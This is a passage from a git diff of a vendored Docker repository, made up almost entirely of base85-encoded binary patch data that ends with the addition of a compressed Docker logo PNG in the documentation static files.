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

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png b/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png
new file mode 100644
index 0000000000000000000000000000000000000000..717d09d773cc46ff8297d06f66d9aa855453f35a
GIT binary patch
literal 4972
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
